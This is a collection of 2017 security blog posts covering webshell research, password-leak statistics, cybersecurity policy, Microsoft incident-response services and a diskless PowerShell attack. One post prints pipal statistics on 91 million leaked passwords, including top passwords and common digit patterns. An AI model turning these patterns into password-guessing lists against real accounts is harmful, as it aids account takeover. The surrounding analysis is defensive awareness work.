Tuesday, May 30, 2017
Tonight, I was invited by the OWASP Belgium Chapter (thank you again!) to present “something“. When I accepted the invitation, I did not really have an idea so I decided to compile the findings around my research about webshells. They are common tools used by bad guys: Once they compromized a server, they often install a webshell which is a kind of toolbox or a RAT (“Remote Access Tool”). It’s very interesting to analyze how such interfaces are protected from unauthorized accesses but also the mistakes that are present in their code. This is a very first version and more will come soon!
My slides are available on slideshare.net:
Wednesday, May 24, 2017
Every company has cybersecurity risks and needs to be aware of them, but understanding your company’s risk profile is just the beginning.
Watch this Modern Workplace episode “Cyber Intelligence: Help Prevent a Breach” to get advice on how to best approach cybersecurity at your company from two Chief Information Security Officers (CISO) – Vanessa Pegueros, CISO at DocuSign, and Mike Convertino, CISO at F5 Networks. Learn how these seasoned security executives make decisions on security spending and how they justify security investments to skeptical executives who may not have ever experienced a security breach.
Knowing what you need to protect is a key component of your security strategy. As Convertino explains, “The value proposition of the company needs to be the thing that you base your protections and recommendations on.” When you have a clear goal for security, it becomes easier to demonstrate the value of your security investments in tools and talent.
You’ll also see a preview of the protection available from Office 365 Threat Intelligence, which lets you monitor and protect against risks before they hit your organization. Using Microsoft’s global presence to provide insight into real-time security threats, Office 365 Threat Intelligence enables you to quickly and effectively set up alerts, dynamic policies, and security solutions for potential threats.
Watch the Modern Workplace episode to learn more.
from Microsoft Secure Blog Staff
Monday, May 22, 2017
Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use, can help better prepare your organization to protect against them.
Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, as well as the threat of lost productivity. Threats now come from a wide range of sources including:
- Script Kiddies who exploit existing code to hack for fun
- Hacking Groups that work together to attack governments and companies
- Hactivists who use hacking skills to promote an agenda
- Black Hat Professionals who make a living from hacking
- Organized Criminal Gangs that steal data to make money
- Nation States that do political and economic espionage
- Cyberweapons Dealers who sell to exploit to other hackers
Learn more about the 7 different hackers and get recommendations on how you can better prepare your organization against their potential threats in this free eBook: 7 Types of Highly Effective Hackers.
from Microsoft Secure Blog Staff
Launceston is known for innovation and is now overseeing an establishment of a cyber security hub in the city. The lead discussion of the proposal took place on Monday during a council meeting.
Alderman Darren Alexander spoke to the council saying that they should be taking advantage of the cyber security growth network set by the federal government of Australia.
The establishment of a growth center is going to play a key role in the government’s $1.1 billion national innovation and science agenda recently announced.
The government will be allocating $31.9 million to fund the growth center till 2020.
The post Launceston will now support cyber security innovation appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Friday, May 19, 2017
There was a lot of buzz about the leak of two huge databases of passwords a few days ago. This has been reported by Try Hunt on his blog. The two databases are called “Anti-Trust-Combo-List” and “Exploit.In“. If the sources of the leaks are not officially known, there are some ways to discover some of them (see my previous article about the “+” feature offered by Google).
A few days after the first leak, a second version of “Exploit.In” was released with even more passwords:
With the huge of amount of passwords released in the wild, you can assume that your password is also included. But what are those passwords? I used Robbin Wood‘s tool pipal to analyze those passwords.
I decided to analyze the Anti-Trust-Combo-List but I had to restart several times due to a lack of resources (pipal requires a lot of memory to generate the statistics) and it failed always. I decided to use a sample of the passwords. I successfully analyzed 91M passwords. The results generated by pipal are available below.
What can we deduce? Weak passwords remain classic. Most passwords have only 8 characters and are based on lowercase characters. Interesting fact: users like to “increase” the complexity of the password by adding trailing numbers:
- Just one number (due to the fact that they have to change it regularly and just increase it at every expiration)
- By adding their birth year
- By adding the current year
Basic Results Total entries = 91178452 Total unique entries = 40958257 Top 20 passwords 123456 = 559283 (0.61%) 123456789 = 203554 (0.22%) passer2009 = 186798 (0.2%) abc123 = 100158 (0.11%) password = 96731 (0.11%) password1 = 84124 (0.09%) 12345678 = 80534 (0.09%) 12345 = 76051 (0.08%) homelesspa = 74418 (0.08%) 1234567 = 68161 (0.07%) 111111 = 66460 (0.07%) qwerty = 63957 (0.07%) 1234567890 = 58651 (0.06%) 123123 = 52272 (0.06%) iloveyou = 51664 (0.06%) 000000 = 49783 (0.05%) 1234 = 35583 (0.04%) 123456a = 34675 (0.04%) monkey = 32926 (0.04%) dragon = 29902 (0.03%) Top 20 base words password = 273853 (0.3%) passer = 208434 (0.23%) qwerty = 163356 (0.18%) love = 161514 (0.18%) july = 148833 (0.16%) march = 144519 (0.16%) phone = 122229 (0.13%) shark = 121618 (0.13%) lunch = 119449 (0.13%) pole = 119240 (0.13%) table = 119215 (0.13%) glass = 119164 (0.13%) frame = 118830 (0.13%) iloveyou = 118447 (0.13%) angel = 101049 (0.11%) alex = 98135 (0.11%) monkey = 97850 (0.11%) myspace = 90841 (0.1%) michael = 88258 (0.1%) mike = 82412 (0.09%) Password length (length ordered) 1 = 54418 (0.06%) 2 = 49550 (0.05%) 3 = 247263 (0.27%) 4 = 1046032 (1.15%) 5 = 1842546 (2.02%) 6 = 15660408 (17.18%) 7 = 14326554 (15.71%) 8 = 25586920 (28.06%) 9 = 12250247 (13.44%) 10 = 11895989 (13.05%) 11 = 2604066 (2.86%) 12 = 1788770 (1.96%) 13 = 1014515 (1.11%) 14 = 709778 (0.78%) 15 = 846485 (0.93%) 16 = 475022 (0.52%) 17 = 157311 (0.17%) 18 = 136428 (0.15%) 19 = 83420 (0.09%) 20 = 93576 (0.1%) 21 = 46885 (0.05%) 22 = 42648 (0.05%) 23 = 31118 (0.03%) 24 = 29999 (0.03%) 25 = 25956 (0.03%) 26 = 14798 (0.02%) 27 = 10285 (0.01%) 28 = 10245 (0.01%) 29 = 7895 (0.01%) 30 = 12573 (0.01%) 31 = 4168 (0.0%) 32 = 66017 (0.07%) 33 = 1887 (0.0%) 34 = 1422 (0.0%) 35 = 1017 (0.0%) 36 = 469 (0.0%) 37 = 250 (0.0%) 38 = 231 (0.0%) 39 = 116 (0.0%) 40 = 435 (0.0%) 41 = 45 (0.0%) 42 = 57 (0.0%) 43 = 14 (0.0%) 44 = 47 (0.0%) 45 = 5 (0.0%) 46 = 13 (0.0%) 47 = 1 (0.0%) 48 = 16 (0.0%) 49 = 14 (0.0%) 50 = 21 (0.0%) 51 = 2 (0.0%) 52 = 1 (0.0%) 53 = 2 (0.0%) 54 = 22 (0.0%) 55 = 1 (0.0%) 56 = 3 (0.0%) 57 = 1 (0.0%) 58 = 2 (0.0%) 60 = 10 (0.0%) 61 = 3 (0.0%) 63 = 3 (0.0%) 64 = 1 (0.0%) 65 = 2 (0.0%) 66 = 9 (0.0%) 67 = 2 (0.0%) 68 = 2 (0.0%) 69 = 1 (0.0%) 70 = 1 (0.0%) 71 = 3 (0.0%) 72 = 1 (0.0%) 73 = 1 (0.0%) 74 = 1 (0.0%) 76 = 2 (0.0%) 77 = 1 (0.0%) 78 = 1 (0.0%) 79 = 3 (0.0%) 81 = 3 (0.0%) 83 = 1 (0.0%) 85 = 1 (0.0%) 86 = 1 (0.0%) 88 = 1 (0.0%) 89 = 1 (0.0%) 90 = 6 (0.0%) 92 = 3 (0.0%) 93 = 1 (0.0%) 95 = 1 (0.0%) 96 = 16 (0.0%) 97 = 1 (0.0%) 98 = 3 (0.0%) 99 = 2 (0.0%) 100 = 1 (0.0%) 104 = 1 (0.0%) 107 = 1 (0.0%) 108 = 1 (0.0%) 109 = 1 (0.0%) 111 = 2 (0.0%) 114 = 1 (0.0%) 119 = 1 (0.0%) 128 = 377 (0.0%) Password length (count ordered) 8 = 25586920 (28.06%) 6 = 15660408 (17.18%) 7 = 14326554 (15.71%) 9 = 12250247 (13.44%) 10 = 11895989 (13.05%) 11 = 2604066 (2.86%) 5 = 1842546 (2.02%) 12 = 1788770 (1.96%) 4 = 1046032 (1.15%) 13 = 1014515 (1.11%) 15 = 846485 (0.93%) 14 = 709778 (0.78%) 16 = 475022 (0.52%) 3 = 247263 (0.27%) 17 = 157311 (0.17%) 18 = 136428 (0.15%) 20 = 93576 (0.1%) 19 = 83420 (0.09%) 32 = 66017 (0.07%) 1 = 54418 (0.06%) 2 = 49550 (0.05%) 21 = 46885 (0.05%) 22 = 42648 (0.05%) 23 = 31118 (0.03%) 24 = 29999 (0.03%) 25 = 25956 (0.03%) 26 = 14798 (0.02%) 30 = 12573 (0.01%) 27 = 10285 (0.01%) 28 = 10245 (0.01%) 29 = 7895 (0.01%) 31 = 4168 (0.0%) 33 = 1887 (0.0%) 34 = 1422 (0.0%) 35 = 1017 (0.0%) 36 = 469 (0.0%) 40 = 435 (0.0%) 128 = 377 (0.0%) 37 = 250 (0.0%) 38 = 231 (0.0%) 39 = 116 (0.0%) 42 = 57 (0.0%) 44 = 47 (0.0%) 41 = 45 (0.0%) 54 = 22 (0.0%) 50 = 21 (0.0%) 48 = 16 (0.0%) 96 = 16 (0.0%) 49 = 14 (0.0%) 43 = 14 (0.0%) 46 = 13 (0.0%) 60 = 10 (0.0%) 66 = 9 (0.0%) 90 = 6 (0.0%) 45 = 5 (0.0%) 71 = 3 (0.0%) 56 = 3 (0.0%) 92 = 3 (0.0%) 79 = 3 (0.0%) 98 = 3 (0.0%) 63 = 3 (0.0%) 61 = 3 (0.0%) 81 = 3 (0.0%) 51 = 2 (0.0%) 58 = 2 (0.0%) 65 = 2 (0.0%) 53 = 2 (0.0%) 67 = 2 (0.0%) 68 = 2 (0.0%) 76 = 2 (0.0%) 111 = 2 (0.0%) 99 = 2 (0.0%) 73 = 1 (0.0%) 72 = 1 (0.0%) 74 = 1 (0.0%) 70 = 1 (0.0%) 69 = 1 (0.0%) 77 = 1 (0.0%) 78 = 1 (0.0%) 64 = 1 (0.0%) 109 = 1 (0.0%) 114 = 1 (0.0%) 119 = 1 (0.0%) 83 = 1 (0.0%) 107 = 1 (0.0%) 85 = 1 (0.0%) 86 = 1 (0.0%) 104 = 1 (0.0%) 88 = 1 (0.0%) 89 = 1 (0.0%) 57 = 1 (0.0%) 100 = 1 (0.0%) 55 = 1 (0.0%) 93 = 1 (0.0%) 52 = 1 (0.0%) 95 = 1 (0.0%) 47 = 1 (0.0%) 97 = 1 (0.0%) 108 = 1 (0.0%) | | | | | | | || ||| ||| ||| ||| ||| ||| ||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| 000000000011111111112222222222333333333344444444445555555555666666666677 012345678901234567890123456789012345678901234567890123456789012345678901 One to six characters = 18900217 (20.73%) One to eight characters = 58813691 (64.5'%) More than eight characters = 32364762 (35.5%) Only lowercase alpha = 25300978 (27.75%) Only uppercase alpha = 468686 (0.51%) Only alpha = 25769664 (28.26%) Only numeric = 9526597 (10.45%) First capital last symbol = 72550 (0.08%) First capital last number = 2427417 (2.66%) Single digit on the end = 13167140 (14.44%) Two digits on the end = 14225600 (15.6%) Three digits on the end = 6155272 (6.75%) Last number 0 = 4370023 (4.79%) 1 = 12711477 (13.94%) 2 = 5661520 (6.21%) 3 = 6642438 (7.29%) 4 = 3951994 (4.33%) 5 = 4028739 (4.42%) 6 = 4295485 (4.71%) 7 = 4055751 (4.45%) 8 = 3596305 (3.94%) 9 = 4240044 (4.65%) | | | | | | | | | ||| ||| |||| ||| | |||||||||| |||||||||| |||||||||| |||||||||| |||||||||| 0123456789 Last digit 1 = 12711477 (13.94%) 3 = 6642438 (7.29%) 2 = 5661520 (6.21%) 0 = 4370023 (4.79%) 6 = 4295485 (4.71%) 9 = 4240044 (4.65%) 7 = 4055751 (4.45%) 5 = 4028739 (4.42%) 4 = 3951994 (4.33%) 8 = 3596305 (3.94%) Last 2 digits (Top 20) 23 = 2831841 (3.11%) 12 = 1570044 (1.72%) 11 = 1325293 (1.45%) 01 = 1036629 (1.14%) 56 = 1013453 (1.11%) 10 = 909480 (1.0%) 00 = 897526 (0.98%) 13 = 854165 (0.94%) 09 = 814370 (0.89%) 21 = 812093 (0.89%) 22 = 709996 (0.78%) 89 = 706074 (0.77%) 07 = 675624 (0.74%) 34 = 627901 (0.69%) 08 = 626722 (0.69%) 69 = 572897 (0.63%) 88 = 557667 (0.61%) 77 = 557429 (0.61%) 14 = 539236 (0.59%) 45 = 530671 (0.58%) Last 3 digits (Top 20) 123 = 2221895 (2.44%) 456 = 807267 (0.89%) 234 = 434714 (0.48%) 009 = 326602 (0.36%) 789 = 318622 (0.35%) 000 = 316149 (0.35%) 345 = 295463 (0.32%) 111 = 263894 (0.29%) 101 = 225151 (0.25%) 007 = 222062 (0.24%) 321 = 221598 (0.24%) 666 = 201995 (0.22%) 010 = 192798 (0.21%) 777 = 164454 (0.18%) 011 = 141015 (0.15%) 001 = 138363 (0.15%) 008 = 137610 (0.15%) 999 = 129483 (0.14%) 987 = 126046 (0.14%) 678 = 123301 (0.14%) Last 4 digits (Top 20) 3456 = 727407 (0.8%) 1234 = 398622 (0.44%) 2009 = 298108 (0.33%) 2345 = 269935 (0.3%) 6789 = 258059 (0.28%) 1111 = 148964 (0.16%) 2010 = 140684 (0.15%) 2008 = 111014 (0.12%) 2000 = 110456 (0.12%) 0000 = 108767 (0.12%) 2011 = 103328 (0.11%) 5678 = 102873 (0.11%) 4567 = 94964 (0.1%) 2007 = 94172 (0.1%) 4321 = 92849 (0.1%) 3123 = 92104 (0.1%) 1990 = 87828 (0.1%) 1987 = 87142 (0.1%) 2006 = 86640 (0.1%) 1991 = 86574 (0.09%) Last 5 digits (Top 20) 23456 = 721648 (0.79%) 12345 = 261734 (0.29%) 56789 = 252914 (0.28%) 11111 = 116179 (0.13%) 45678 = 96011 (0.11%) 34567 = 90262 (0.1%) 23123 = 84654 (0.09%) 00000 = 81056 (0.09%) 54321 = 73623 (0.08%) 67890 = 66301 (0.07%) 21212 = 28777 (0.03%) 23321 = 28767 (0.03%) 77777 = 28572 (0.03%) 22222 = 27754 (0.03%) 55555 = 26081 (0.03%) 66666 = 25872 (0.03%) 56123 = 21354 (0.02%) 88888 = 19025 (0.02%) 99999 = 18288 (0.02%) 12233 = 16677 (0.02%) Character sets loweralphanum: 47681569 (52.29%) loweralpha: 25300978 (27.75%) numeric: 9526597 (10.45%) mixedalphanum: 3075964 (3.37%) loweralphaspecial: 1721507 (1.89%) loweralphaspecialnum: 1167596 (1.28%) mixedalpha: 981987 (1.08%) upperalphanum: 652292 (0.72%) upperalpha: 468686 (0.51%) mixedalphaspecialnum: 187283 (0.21%) specialnum: 81096 (0.09%) mixedalphaspecial: 53882 (0.06%) upperalphaspecialnum: 39668 (0.04%) upperalphaspecial: 18674 (0.02%) special: 14657 (0.02%) Character set ordering stringdigit: 41059315 (45.03%) allstring: 26751651 (29.34%) alldigit: 9526597 (10.45%) othermask: 4189226 (4.59%) digitstring: 4075593 (4.47%) stringdigitstring: 2802490 (3.07%) stringspecial: 792852 (0.87%) digitstringdigit: 716311 (0.79%) stringspecialstring: 701378 (0.77%) stringspecialdigit: 474579 (0.52%) specialstring: 45323 (0.05%) specialstringspecial: 28480 (0.03%) allspecial: 14657 (0.02%)
[The post Your Password is Already In the Wild, You Did not Know? has been first published on /dev/random]
Thursday, May 18, 2017
I published the following diary on isc.sans.org: “My Little CVE Bot“.
The massive spread of the WannaCry ransomware last Friday was another good proof that many organisations still fail to patch their systems. Everybody admits that patching is a boring task. They are many constraints that make this process very difficult to implement and… apply! That’s why any help is welcome to know what to patch and when… [Read more]
Wednesday, May 17, 2017
The recent revision of the National Standards and Technology Institute’s (NIST) Cybersecurity Framework and the publication of European Network and Security Agency’s (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much the differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.
The starting point was strikingly similar for both economic powers: the Directive and the Framework seek to improve cybersecurity of critical infrastructures. They came out at around the same time in early 2013, when the European Commission first introduced the Directive and when Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.
Given the considerable differences in the US and the EU political, legislative and executive “machines” it is no surprise that, even with these common starting points, the two have followed very different paths. The Framework is undergoing its first major revision in 3 years based on changes in threat and experiences of global adopters. The Directive is now only beginning the implementation phase in the EU member states.
The NIST’s creation of the Framework has been rightly held up as a successful example of public-private partnership. It used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result was a Framework that is now being referenced around the world, by businesses and governments and it is being considered as a starting point for ISO 27103.
On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the efforts to coordinate the necessary agreements at the “top” the resulting Directive lacked some of the obvious “bottom-up” characteristics of the Framework. But the benefit of the Directive, creates durable institutions in EU member states, coordination processes, and security baselines. As a result, the it is likely to result in a very different return on investment than the Framework.
But this should not just be a story of different approaches to cybersecurity policy. The EU approach to building institutions and setting capabilities requirements, if implemented and evolved, will help provide a layer of coordination and security that did not exist. The Framework’s voluntary nature and global adoption is better at preparing enterprises – public and private – for improving risk management measures.
These are substantial differences, from the perspective of both businesses and regulators in these two approaches. However, in the end they may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity as they seek to leverage implementing terminology and standards. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that can be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.
Cybercriminals and cyberattacks will inevitably be encouraged and enabled by serious divergence in approaches to cybersecurity, wherever in the world these occur. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the situation of the US and the EU and to set an example to the rest of the world.
from Paul Nicholas
Tuesday, May 16, 2017
This post is authored by Berk Veral, Senior Marketing Communication Manager, Enterprise Cybersecurity Group.
Perhaps one of the best-kept secrets within Microsoft cybersecurity services is the Global Incident Response and Recovery team. We affectionately call them the “GIRR” team for short. Not many people know about the team but, for those whom they have helped to combat cyber criminals, they are indispensable – a trusted partner when the worst cybercrimes happen.
The GIRR team is comprised of elite cybersecurity professionals who are experts in handling critical incidents and helping our customers during a crisis when a compromise or a breach is suspected. On an ongoing basis, the team works around the clock and around the globe, demonstrating grit, fortitude and steadfast dedication to Microsoft customers in need.
The team is expanding and now offers two new services for our customers: Persistent Adversary Detection Services – Cloud Enabled (PADS-CE) and Compromise Recovery (CR). These are two very different standalone services designed to help customers under specific circumstances.
Cloud-Based Persistent Adversary Detection Service
PADS-CE is a cybersecurity service for customers who want to understand their exposure to the risks posed by today’s targeted attacks from determined human adversaries and sophisticated criminal organizations. However, unlike a traditional PADS engagement where all resources would be deployed onsite at the customer’s location, PADS-CE leverages a secure Azure workspace for collaboration, allowing remote team members to participate in the engagement. PADS-CE provides the ability to leverage the unique skill sets of seasoned Incident Responders worldwide, culminating in a richer engagement experience and output for our customers.
PADS-CE is ideal for enterprise customers primarily running Windows endpoints who would like to validate that they have not been victim to a target attack. It is a proactive, discrete service that is, in effect, an incident response prior to an actual emergency.
Microsoft will provide information regarding the customer’s exposure to targeted attacks via PADS-CE at a lower price point by leveraging Azure and a team of remote resources. PADS-CE leverages telemetry from Microsoft’s vast, global sensor network, and is able to correlate PADS-CE findings against threat intelligence worldwide. The team leverages proprietary scanners (that do not remain on the network), to detect the presence of implants, backdoors, and similar unauthorized malc0de. Through forensic analysis and reverse engineering of any implants found, the team can assess customers’ current exposure to the threats posed by targeted attacks.
Microsoft Compromise Recovery (CR) service is a cybersecurity offering designed to restore a customer’s secure business operations after a compromise. The service runs in parallel with any ongoing incident response investigation or soon after its completion, whether performed by Microsoft or a 3rd party.
It consists of four principal components:
- Scoping of the compromise
- Installing critical hardening policies
- Deploying and tuning tactical monitoring solutions
- Coordinating an attacker eviction event
CR is ideal for enterprise customers primarily running Windows endpoints who have confirmed malicious activity in their environment. Most likely, they have already engaged Microsoft or a 3rd party to complete an incident response investigation.
CR will help customers get their business operations back up and running by remediating their exposure to risks after an incident response investigation. CR will remove identified malicious activity from their network, harden against further compromise and monitor for indicators of compromise based on the current attack.
In addition to restoring a customer’s secure business operations and providing information regarding the customer’s remaining risk exposure, CR will offer suggestions for strategic initiatives to improve security posture. Microsoft leverages best in class monitoring solutions – Advanced Threat Analytics (ATA) and Operations Management Suite (OMS) – to monitor systems after a compromise. Compromise Recovery is based on years of industry expertise and best practices with incident response, based on the Microsoft GIRR team successfully leading countless recoveries around the globe.
Trusted Security Partner Every Step of the Way
These two offerings bring Microsoft customers expanded capabilities in cybersecurity, and provide the Microsoft Global Incident Response and Recovery team another tool to ensure Microsoft can be counted on by every enterprise CISO as their trusted security partner when it comes to detecting and responding to incidents, as well as getting business operations back up and running in the wake of an incident.
Please visit Sharing Microsoft learnings from major cybersecurity incidents to learn more about the Microsoft Global Incident Response and Recovery team and how they can help your organization.
from Microsoft Secure Blog Staff
Monday, May 15, 2017
This post is authored by Angela McKay, Director of Cybersecurity Policy.
Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.
Even just a few days in Tokyo demonstrated that the focus on the importance of cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry. The understanding that concrete action is now needed is also growing.
Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks, to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical consideration, such as the development of security practices and requirements, particularly for critical infrastructure and government.
What is particularly praise-worthy and unique in the Japanese approach, is the iterative way the government is tackling challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risks, and the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted and reexamined areas where outcomes have proven to be difficult to attain, for example cross-government cooperation on cybersecurity.
Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments which understands that cybersecurity is not an area that can be looked at once and then ignored for the next decade. It is using the impetus behind the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can increase security of the government, critical infrastructures, and for the Internet of Things (IoT). It actively seeks to assess progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is increasing the security of the Games and key sectors of the economy. It does this not just through forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes and 2) cultural and structural obstacles that might be particular to Japan are understood and addressed.
A similar approach is being pursued when it comes to encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guide, as they are realizing that while the voluntary nature of their cybersecurity efforts remains pivotal, many of the private sector enterprises are looking for more specific guidance on how to move forward in this area. In our response, Microsoft therefore suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, where the government and private sector collaborated to develop guidance that built on proven standards and best practices within an overarching framework that is meaningful to executives.
Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. Japan recently announced a new partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, as well as proposals on how to best secure this new area of innovation. This has given Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that should be addressed by players in IoT services (with a link to our NTIA response for more detail). Their solutions, including the use of incentives to drive behaviors, will be looked at by other governments, not just regionally but across the globe.
In the era of digitalization, every government and organization should look to and incorporate and codify effective initiatives and programs, such as Japan’s, into their policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will require the leadership of countries such as Japan and the commitment of industry leaders such as ourselves to ensure the safety and security in the digital space.
from Microsoft Secure Blog Staff
Friday, May 12, 2017
I published the following diary on isc.sans.org: “When Bad Guys are Pwning Bad Guys…“.
A few months ago, I wrote a diary about webshells and the numerous interesting features they offer. They’re plenty of web shells available, there are easy to find and install. They are usually delivered as one big obfuscated (read: Base64, ROT13 encoded and gzip’d) PHP file that can be simply dropped on a compromised computer. Some of them are looking nice and professional like the RC-Shell… [Read more]
Thursday, May 11, 2017
Cybercrime has been there all this time in one form or the other for decades, but the threat it poses today is unlike anything we have seen in the past. With attackers now increasing in numbers and coming from different regions of the world with different intentions, organizations in the US and around the world are now at a huge risk of an attack with unbearable consequences.
Broadcasting companies may not have been targeted regularly, but that doesn’t mean they are safe from the threats. Actually, they depend a lot on technology to help them broadcast their stream on radio and TV. To avoid becoming a victim, broadcasting companies should come together to fight cyber crime.
The post Why broadcasters should work together to prevent cyber crime appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Wednesday, May 10, 2017
This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.
Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have been published describing the more difficult to detect cyberattacks which leverage normal tools, already present in an enterprise, to achieve their mission. SecureList calls the techniques used in these situations “invisible” and “diskless”. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.
To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:
- Microsoft Enterprise Threat Detection
- Windows Defender Advanced Threat Protection
- Microsoft Advanced Threat Analytics
Here is a summary of why these can help you.
The Microsoft Enterprise Threat Detection (ETD) service, is a managed detection service, able to detect invisible/diskless attacks and provide enterprises with actionable intelligence to effectively respond to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature along with Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA) provide you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.
Enterprise Threat Detection can consume a variety of data sources:
- Windows error reports can contain memory of a faulting process, registry keys, files, and the results of WMI queries
- Telemetry sent from the organization’s IP egress ranges in the form of the Microsoft Active Protection System (MAPS)
- Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
- Using ATA and Windows Defender ATP on Windows 10 monitors those signals and provides advanced detection and response data
To illustrate leveraging the Windows Error Reporting data for this type of advanced analysis, the Microsoft ETD team recently received an event from a customer environment, which was due to a crash in PowerShell.
In this case, PowerShell was executing an object stored in a base64 encoded string. Automated analysis of the memory of the PowerShell process indicated contained code consistent with malicious code in the form of shellcode:
In this case, further analysis revealed that the code was being reflectively loaded into the PowerShell process attempts to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and file that was being requested.
Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the metasploit meterpreter, a popular penetration testing tool. However, the meterpreter code was never written as a file to disk, therefore it was diskless, loaded only from an external site, making detection within the customer environment difficult.
Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing them with actionable intelligence. This specific actionable intelligence included indicators of attack that can be used to analyze additional data such as proxy logs, to determine if this activity was still ongoing and/or impacting other machines in their environment.
In conclusion, organizations need to be aware of this type of malicious behavior becoming more prevalent in cybercrime. Microsoft has many insights and tools for enterprises to help keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft Account Team or email email@example.com.
from Microsoft Secure Blog Staff
For years, Google is offering two nice features with his gmail.com platform to gain more power of your email address. You can play with the “+” (plus) sign or “.” (dot) to create more email addresses linked to your primary one. Let’s take an example with John who’s the owner of firstname.lastname@example.org. John can share the email address “email@example.com” with his friends playing soccer or “firstname.lastname@example.org” to register on forums talking about information security. It’s the same with dots. Google just ignore them. So “email@example.com” is the same as “firstname.lastname@example.org”. Many people use the “+” format to optimize the flood of email they receive every day and automatically process it / store it in separate folders. That’s nice but it can also be very useful to discover where an email address is being used.
A few days ago, Troy Hunt, the owner of haveibeenpwned.com service (if you don’t know it yet, just have a look and register!), announced that new massive dumps were in the wild for a total of ~1B passwords! The new dumps are called “Exploit.In” (593M entries) and “Anti Public Combo List” (427M entries). The sources of the leaks are not clear. I grabbed a copy of the data and searched for Google “+” email addresses.
Not surprising, I found +28K unique accounts! I extracted strings after the “+” sign and indexed everything in Splunk:
As you can see, we recognise some known online services:
- xtube (adult content)
- friendster (social network)
- filesavr (file exchange service in the cloud)
- linkedin (social network)
- bioware (gaming platform)
This does not mean that those platforms were breached (ok, LinkedIn was) but it can give some indicators…
Here is a dump of the top identified tags (with more than 3 characters to keep the list useful). You can download the complete CSV here.
[The post Identifying Sources of Leaks with the Gmail “+” Feature has been first published on /dev/random]
Tuesday, May 9, 2017
This post is authored by Daniel Grabski, Executive Security Advisor, Enterprise Cybersecurity Group.
As an Executive Security Advisor for the Central and Eastern European region, I engage every day with Chief Information Security Officers (CISOs) to learn their thoughts and concerns. One very hot topic raised at nearly every meeting, conference or seminar I attend with customers and partners, regards the General Data Protection Regulation or GDPR. In essence, the GDPR is fundamentally about protecting and enabling the privacy rights of individuals. It establishes strict global privacy requirements governing how you manage and protect personal data while respecting individual choice – no matter where data is sent, processed, or stored.
Without a doubt, GDPR is one of the biggest changes coming to European Union privacy laws in recent years. It is a complex regulation that may require significant changes for every company that:
- Is established in the EU.
- Sells goods or services in the EU.
- Monitors and processes data of those in the EU, regardless of where that processing and monitoring takes place.
The GDPR requirements may also include the technology used within organizations, as well relevant people and processes required to be in place to manage all the stages. Even once the GDPR is enforced as of 25 May 2018, compliance will be an ongoing process.
In this post, in order to help answer the most common questions I hear from CISOs, I will briefly address the following:
- What does Microsoft’s journey to GDPR compliance look like?
- What can I do today?
- What is the role of my cloud provider?
- How can technology help me with compliance?
What does Microsoft’s journey to GDPR compliance look like?
